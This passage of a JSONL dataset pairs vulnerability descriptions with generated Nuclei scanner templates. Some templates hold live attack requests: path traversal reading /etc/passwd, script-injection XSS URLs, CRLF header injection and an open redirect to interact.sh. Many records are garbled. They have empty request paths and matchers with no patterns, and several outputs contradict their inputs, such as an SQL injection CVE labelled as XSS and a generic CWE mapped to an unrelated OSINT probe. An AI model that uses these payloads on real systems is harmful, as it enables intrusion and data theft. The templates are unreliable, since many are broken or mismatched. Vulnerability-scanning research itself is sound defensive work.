Service Application Insights Not Enabled\nSummary: Azure App Service Application Insights Not Enabled. Ensure that the Application Insights feature is enabled for all your Microsoft Azure App Services applications in order to provide advanced application monitoring. Application Insights is an extensible Application Performance Management (APM) service for developers and DevOps professionals available as monitoring feature within Azure cloud. The feature monitors your live App Services applications to automatically detect performance anomalies. I\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: azure-appservice-insights-not-enabled\n\ninfo:\n name: Azure App Service Application Insights Not Enabled\n author: princechaddha\n severity: medium\n description: Ensure that the Application Insights feature is enabled for all your Microsoft Azure App Services applications in order to provide advanced application monitoring. Application Insights is an extensible Application Performance Management (APM) service for developers and DevOps professionals available as monitoring feature within Azure cloud. The feature monitors your live App Services applications to automatically detect performance anomalies. It includes powerful analytics tools to help diagnose issues and understand what users do with your application. Application Insights can be enabled for apps on various platforms including .NET, Node.js, and Java EE, hosted on-premises, hybrid, or other public cloud platforms.\n tags: cloud,devops,azure,microsoft,application-insights,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "azure-appservice-insights-not-enabled"} {"instruction": "Generate a Nuclei template for CVE-2020-27467", "input": "Title: Path Traversal in processwire processwire\nSummary: A Directory Traversal vulnerability exits in Processwire CMS before 2.7.1 via the download parameter to index.php.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: processwire processwire\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-27467\n\ninfo:\n name: Processwire CMS <2.7.1 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php.\n tags: cve,cve2020,processwire,lfi,cms,oss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?download=/etc/passwd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2020-27467"} {"instruction": "Generate a Nuclei template for: Apache StreamPipes - Detect", "input": "Title: Apache StreamPipes - Detect\nSummary: Apache StreamPipes - Detect. Checks for the presence of Apache StreamPipes by looking in the body or matching the favicon hash.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: apache-streampipes-detect\n\ninfo:\n name: Apache StreamPipes - Detect\n author: Alessandro Albani - DEVisions\n severity: info\n description: Checks for the presence of Apache StreamPipes by looking in the body or matching the favicon hash.\n tags: tech,apache,streampipes,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/streampipes-backend/api/openapi.json\" \n - \"{{BaseURL}}/assets/img/favicon/favicon.ico\" \n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: or", "category": "generic", "severity": "info", "id": "apache-streampipes-detect"} {"instruction": "Generate a Nuclei template for: Enterprise WeChat Corpsecret Key", "input": "Title: Enterprise WeChat Corpsecret Key\nSummary: Enterprise WeChat Corpsecret Key. Tags: wechat, exposure, tencent\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wechat-corpsecret-key\n\ninfo:\n name: Enterprise WeChat Corpsecret Key\n author: N0el4kls\n severity: info\n description: Enterprise WeChat Corpsecret Key\n tags: wechat,exposure,tencent,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "wechat-corpsecret-key"} {"instruction": "Generate a Nuclei template for CVE-2020-24902", "input": "Title: Cross-Site Scripting (XSS) in quixplorer_project quixplorer\nSummary: Quixplorer <=2.4.1 is vulnerable to reflected cross-site scripting (XSS) caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: quixplorer_project quixplorer\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-24902\n\ninfo:\n name: Quixplorer <=2.4.1 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve,cve2020,quixplorer,xss,quixplorer_project,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"&srt=yes\" \n - \"My Download\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2020-24902"} {"instruction": "Generate a Nuclei template for: Browshot API Test", "input": "Title: Browshot API Test\nSummary: Browshot API Test. Easily make screenshots of web pages in any screen size, as any device\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-browshot\n\ninfo:\n name: Browshot API Test\n author: daffainfo\n severity: info\n description: Easily make screenshots of web pages in any screen size, as any device\n tags: token-spray,browshot\n\nhttp:\n - method: GET\n path:\n - \"https://api.browshot.com/api/v1/simple?url=http://mobilito.net/&instance_id=12&width=640&height=480&key={{token}}\" \n matchers:\n - type: word\n words:\n - \"\"cost\"\" \n - \"\"priority\"\" \n - \"\"url\"\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-browshot"} {"instruction": "Generate a Nuclei template for: Woodwing Studio Server - Git Config", "input": "Title: Woodwing Studio Server - Git Config\nSummary: Woodwing Studio Server - Git Config. Woodwing Studio Server .git/config file exposed.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: woodwing-git\n\ninfo:\n name: Woodwing Studio Server - Git Config\n author: pdteam\n severity: medium\n description: Woodwing Studio Server .git/config file exposed.\n tags: misconfig,woodwing,git,config,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Server/.git/config\" \n - \"{{BaseURL}}/StudioServer/.git/config\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "medium", "id": "woodwing-git"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: teamtreehouse\n\ninfo:\n name: Teamtreehouse User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Teamtreehouse user name information check was conducted.\n tags: osint,osint-coding,teamtreehouse,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://teamtreehouse.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Member Since\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2022-29316", "input": "Title: SQL Injection in complete_online_job_search_system_project complete_online_job_search_system\nSummary: Complete Online Job Search System v1.0 was discovered to contain a SQL injection vulnerability via /eris/index.php?q=result&searchfor=advancesearch.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: complete_online_job_search_system_project complete_online_job_search_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-29316\n\ninfo:\n name: Complete Online Job Search System 1.0 - Cross-Site Scripting\n author: arafatansari\n severity: high\n description: Complete Online Job Search System 1.0 contains a cross-site scripting vulnerability via index.php?q=advancesearch.\n tags: cve,cve2022,xss,eris,sqli,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Result : \" \n - \"ERIS\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2022-29316"} {"instruction": "Generate a Nuclei template for CVE-2021-22502", "input": "Title: OS Command Injection in microfocus operation_bridge_reporter\nSummary: Remote Code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) product, affecting version 10.40. The vulnerability could be exploited to allow Remote Code Execution on the OBR server.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: microfocus operation_bridge_reporter\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-22502\n\ninfo:\n name: Micro Focus Operations Bridge Reporter - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n tags: cve2021,cve,microfocus,obr,rce,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"http\" \n - \"dns\" \n part: interactsh_protocol\n - type: word\n words:\n - \"An error occurred\" \n - \"AUTHENTICATION_FAILED\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 401", "category": "cve", "severity": "critical", "id": "CVE-2021-22502"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: steemit\n\ninfo:\n name: Steemit User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Steemit user name information check was conducted.\n tags: osint,osint-social,steemit,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://steemit.com/@{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"blog\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Cross-site Scripting", "input": "Title: Cross-site Scripting (CWE-79)\nSummary: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.\nVulnerability Type: Cross-site Scripting\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: parallels-hsphere-xss\n\ninfo:\n name: Parallels H-Sphere - Cross-Site Scripting\n author: ritikchaddha\n severity: high\n description: Parallels H-Sphere contains multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.\n tags: hsphere,xss,edb,parallels,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webshell4/login.php?err=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n - \"{{BaseURL}}/webshell4/login.php?login=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"value=\"\\\">\" \n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-79"} {"instruction": "Generate a Nuclei template for: ICTBroadcast Login Panel - Detect", "input": "Title: ICTBroadcast Login Panel - Detect\nSummary: ICTBroadcast Login Panel - Detect. ICTBroadcast login panel was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: ictbroadcast-panel\n\ninfo:\n name: ICTBroadcast Login Panel - Detect\n author: rxerium\n severity: info\n description: ICTBroadcast login panel was detected.\n tags: panel,ictbroadcast,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/login.php\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "ictbroadcast-panel"} {"instruction": "Generate a Nuclei template for CVE-2011-4640", "input": "Title: Path Traversal in spamtitan webtitan\nSummary: Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: spamtitan webtitan\nIndicators: error, vulnerability detected", "output": "id: CVE-2011-4640\n\ninfo:\n name: WebTitan < 3.60 - Local File Inclusion\n author: ctflearner\n severity: medium\n description: Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.\n tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2011-4640"} {"instruction": "Generate a Nuclei template for CVE-2016-4975", "input": "Title: Vulnerability (CWE-93) in apache http_server\nSummary: Possible CRLF injection allowing HTTP response splitting attacks for sites which use mod_userdir. This issue was mitigated by changes made in 2.4.25 and 2.2.32 which prohibit CR or LF injection into the \"Location\" or other outbound header key or value. Fixed in Apache HTTP Server 2.4.25 (Affected 2.4.1-2.4.23). Fixed in Apache HTTP Server 2.2.32 (Affected 2.2.0-2.2.31).\nVulnerability Type: Vulnerability (CWE-93)\nSeverity: medium\nAffected Products: apache http_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2016-4975\n\ninfo:\n name: Apache mod_userdir CRLF injection\n author: melbadry9,nadino,xElkomy\n severity: medium\n description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.\n tags: cve2016,cve,crlf,apache,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection\" \n matchers:\n - type: regex\n part: header", "category": "cve", "severity": "medium", "id": "CVE-2016-4975"} {"instruction": "Generate a Nuclei template for CVE-2015-1000012", "input": "Title: Information Disclosure in mypixs_project mypixs\nSummary: Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin\nVulnerability Type: Information Disclosure\nSeverity: high\nAffected Products: mypixs_project mypixs\nIndicators: error, vulnerability detected", "output": "id: CVE-2015-1000012\n\ninfo:\n name: WordPress MyPixs <=0.3 - Local File Inclusion\n author: daffainfo\n severity: high\n description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.\n tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,mypixs_project,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd\" \n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2015-1000012"} {"instruction": "Generate a Nuclei template for CVE-2024-31839", "input": "Title: Cross-Site Scripting (XSS) in tiagorlampert chaos\nSummary: Cross Site Scripting vulnerability in tiagorlampert CHAOS v.5.0.1 allows a remote attacker to escalate privileges via the sendCommandHandler function in the handler.go component.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: tiagorlampert chaos\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-31839\n\ninfo:\n name: CHAOS 5.0.1 'sendCommandHandler' - Cross-Site Scripting\n author: riteshs4hu\n severity: medium\n description: Cross Site Scripting vulnerability in tiagorlampert CHAOS v.5.0.1 allows a remote attacker to escalate privileges via the sendCommandHandler function in the handler.go component.\n tags: cve,cve2024,chaos,tiagorlampert,xss,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2024-31839"} {"instruction": "Generate a Nuclei template for CVE-2011-5252", "input": "Title: Vulnerability (CWE-20) in orchardproject orchard\nSummary: Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter.\nVulnerability Type: Vulnerability (CWE-20)\nSeverity: medium\nAffected Products: orchardproject orchard\nIndicators: error, vulnerability detected", "output": "id: CVE-2011-5252\n\ninfo:\n name: Orchard 'ReturnUrl' Parameter URI - Open Redirect\n author: ctflearner\n severity: medium\n description: Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter.\n tags: cve,cve2011,redirect,orchard,orchardproject,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fhttp://interact.sh%3f\" \n matchers:\n - type: regex\n part: header", "category": "cve", "severity": "medium", "id": "CVE-2011-5252"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: ivanti-endpoint-manager\n\ninfo:\n name: Ivanti Endpoint Manager - Detect\n author: ritikchaddha\n severity: info\n description: Detects the presence of Ivanti Endpoint Manager (formerly LANDesk Management Suite) servers.\n tags: tech,ivanti,epm,detect,landdesk,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/ldlogon.dll\" \n - \"{{BaseURL}}/core/login\" \n - \"{{BaseURL}}/webaccess\" \n matchers:\n - type: word\n words:\n - \"Ivanti Endpoint Manager\" \n - \"LANDesk Management\" \n - \"Ivanti(R) Cloud Services\" \n - \"Ivanti Cloud Services Appliance\" \n - \"LANDesk(R) Cloud Services Appliance\" \n - \"LANDesk(R) Management\" \n part: body\n condition: or\n - type: word\n words:\n - \"LANDesk\" \n - \"Ivanti EPM\" \n part: header\n condition: or\n - type: regex\n part: response\n condition: or", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: nginx-ui-dashboard\n\ninfo:\n name: Nginx UI Panel - Detect\n author: gy741\n severity: info\n description: Nginx UI panel was detected.\n tags: panel,nginx,exposure,f5,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Nginx UI\" \n - \"Main Config\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: fortiweb-login\n\ninfo:\n name: Fortinet FortiWeb Login Panel - Detect\n author: PR3R00T,daffainfo\n severity: info\n description: Fortinet FortiWeb login panel was detected.\n tags: panel,fortinet,fortiweb,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: word\n words:\n - \"Please login\" \n - \"ftnt-fortinet-grid\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2025-61884", "input": "Title: Path Traversal in oracle configurator\nSummary: Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: Runtime UI). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Configurator accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: oracle configurator\nIndicators: unauthorized", "output": "id: CVE-2025-61884\n\ninfo:\n name: Oracle E-Business Suite - Server-Side Request Forgery\n author: Kazgangap\n severity: high\n description: Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: Runtime UI). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator.\n tags: cve,cve2025,oracle,e-business,kev,vkev\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2025-61884"} {"instruction": "Generate a Nuclei template for CVE-2023-30943", "input": "Title: Vulnerability (CWE-73) in moodle moodle and others\nSummary: The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system.\nVulnerability Type: Vulnerability (CWE-73)\nSeverity: medium\nAffected Products: moodle moodle, fedoraproject extra_packages_for_enterprise_linux, fedoraproject fedora\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-30943\n\ninfo:\n name: Moodle - Cross-Site Scripting/Remote Code Execution\n author: ritikchaddha\n severity: medium\n description: The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. Moodle versions 4.1.x before 4.1.3 and 4.2.x before 4.2.0 are susceptible to an unauthenticated arbitrary folder creation, tracked as CVE-2023-30943. An attacker can leverage the creation of arbitrary folders to carry out a Stored Cross-Site Scripting (XSS) attack on the administration panel, resulting in arbitrary code execution on the server as soon as an administrator visits the panel.\n tags: cve,cve2023,moodle,xss,rce,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n - \">archive\" \n - \"File icon\" \n part: body_4\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header_4\n - type: status\n status:\n - 200\n part: header_4", "category": "cve", "severity": "medium", "id": "CVE-2023-30943"} {"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: iptime-default-login\n\ninfo:\n name: ipTIME Default Login\n author: gy741\n severity: high\n description: ipTIME default admin credentials were discovered.\n tags: iptime,default-login,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"setCookie\" \n - \"efm_session_id\" \n - \"login.cgi\" \n part: body\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-522"} {"instruction": "Generate a Nuclei template for: OpenVas Login Panel - Detect", "input": "Title: OpenVas Login Panel - Detect\nSummary: OpenVas Login Panel - Detect. An OpenVas Admin login panel was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: openvas-panel\n\ninfo:\n name: OpenVas Login Panel - Detect\n author: rxerium\n severity: info\n description: An OpenVas Admin login panel was detected.\n tags: panel,openvas,admin,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Greenbone Security Assistant\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "openvas-panel"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: pop3-detect\n\ninfo:\n name: POP3 Protocol - Detect\n author: pussycat0x\n severity: info\n description: POP3 protocol was detected.\n tags: network,detect,pop3,mail,detection,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2023-29300", "input": "Title: Deserialization of Untrusted Data in adobe coldfusion\nSummary: Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\nVulnerability Type: Deserialization of Untrusted Data\nSeverity: critical\nAffected Products: adobe coldfusion\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-29300\n\ninfo:\n name: Adobe ColdFusion - Pre-Auth Remote Code Execution\n author: rootxharsh,iamnoooob,pdresearch\n severity: critical\n description: Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-29300"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: aem-sling-login\n\ninfo:\n name: Adobe Experience Manager Sling User Login - Detect\n author: dhiyaneshDk\n severity: info\n description: Adobe Experience Manager Sling user login panel was detected.\n tags: panel,aem,adobe,sling,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/system/sling/cqform/defaultlogin.html\" \n matchers:\n - type: word\n words:\n - \"<title>Login\" \n - \"j_username\" \n - \"j_password\" \n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: patientslikeme\n\ninfo:\n name: PatientsLikeMe User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: PatientsLikeMe user name information check was conducted.\n tags: osint,osint-health,patientslikeme,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.patientslikeme.com/members/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"s profile | PatientsLikeMe\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2021-41648", "input": "Title: SQL Injection in online-shopping-system-advanced_project online-shopping-system-advanced\nSummary: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: online-shopping-system-advanced_project online-shopping-system-advanced\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-41648\n\ninfo:\n name: PuneethReddyHC action.php SQL Injection\n author: daffainfo\n severity: high\n description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input.\n tags: cve2021,cve,sqli,packetstorm,online-shopping-system-advanced_project,vuln\n\nhttp:\n 